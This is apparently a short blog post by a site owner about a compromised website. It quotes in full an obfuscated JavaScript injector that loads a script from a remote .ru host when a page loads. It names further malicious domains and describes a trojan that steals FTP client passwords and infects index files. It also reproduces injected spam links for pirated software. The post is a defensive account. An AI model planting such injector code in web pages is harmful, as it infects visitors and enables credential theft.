The code was running the script from http://gamer-com-tw.wrzuta.pl.play-com.brownbagbar.ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/<script>/*GNU GPL*/
try{window.onload = function(){var V9vs0ipwfom
= document.createElement('script');
V9vs0ipwfom.setAttribute('type', 'text/javascript');
V9vs0ipwfom.setAttribute('id', 'myscript1');
V9vs0ipwfom.setAttribute('src', 'h#&t$^&t#&!^&p$#!#:^/$!!/!&#g))a#(m&!@e!r@)-#)@c&^$o#&
(m@^-&^#(t#@#(w^.^w$$r^)!z(&#u&t&()a)(.&#!p@@$&l!!).)@p)#$l$&a^(y)^@^-(c)^^o^!@@m&!(#.)b&#)(r))(o!
(w!!#n!#b&&a&&(@g#^b$&&a#&r@@#.$#&
(r(u(:$^#8#)0($8!0!&&/((&g)o((&(o@#(g()(l@e!@).^)c^!)@^o^#)m^&!
/&)@g#)$!o(o##&g)l#)!e!&@).^(c!(o(!$m^)^/!@&w!@o(^!r(@!(d@#$p!$r$#
(!&e)s$^s(!.$o#@(r@g^@!/@!#h@p@^.$c@^o&()m^@)/$#)^s$u)r)v!e)@$y$$m&!!o)
(@$n!@k&#@e$(#&$y!#^$.!#c#&o&m!(/&&'
.replace(/@|&|\)|\^|#|\(|\$|\!/ig, ''));
V9vs0ipwfom.setAttribute('defer', 'defer');
document.body.appendChild(V9vs0ipwfom);}}
catch(e) {}script>
Searching in google I found that the script take also the code from http://live.com.google.com.baidu-msn.com.bestartsale.ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/ or http://xtube-com.blogger.com.pornorama-com.bluejackmusic.ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/
The solution was Malwarebytes Anti-Malware scanner which detect next files (trojans): siszyd32.exe and av_md.exe guess where, in system 32 :)
What does this trojan do? Simple get the passwords stored on Fillezila, total commander or other ftp clients that you may use and check the password storage!! After this the trojan login and infect all files called index or default .html/.php/.htm
Update: Same happened with a javascript that inset into your wordpress header next code:
nero burining rom. native instruments traktor manual sony sacd http://www.kaonsoft.com">Downloadable Software nero killer microsoft works 6.0 . burn bin image nero microsoft visual studio for harding. nero templet downloads nero digital audio codec download http://www.kaonsoft.com/buy-sony-cd-architect-52/">Buy Sony CD Architect 5.2 | Downloadable Software pinnacle studio 10 quicktime action class lawsuit nero v . microsoft windows internet connection sharing pinnacle studio plus 9.3.2.48 trial download. pinnacle studio plus v11 p2m microsoft windows vista ultimate edition x32 http://www.kaonsoft.com/buy-sony-acid-pro-6/">Buy Sony ACID Pro 6 | Downloadable Software microsoft windows 2000 update downloads nero photo viewer not working . nero burning rom recording software free nero 6 update. reason how to automate propellerhead microsoft windows 2003 server isntallation http://www.kaonsoft.com/buy-smith-micro-poser-7/">Buy Smith Micro Poser 7 | Downloadable Software microsoft word 2000 windows xp nero nve 4 . nero internal error sony acid will not start. video transitions nero sony bravia xbr 52 lcd hdtv http://www.kaonsoft.com/buy-smartsoft-smartftp-home-30/">Buy SmartSoft SmartFTP Home 3.0 |..
Solution is the same Malwarebytes Anti-Malware
I also hope your hosting company have backups of your sites!
No comments:
Post a Comment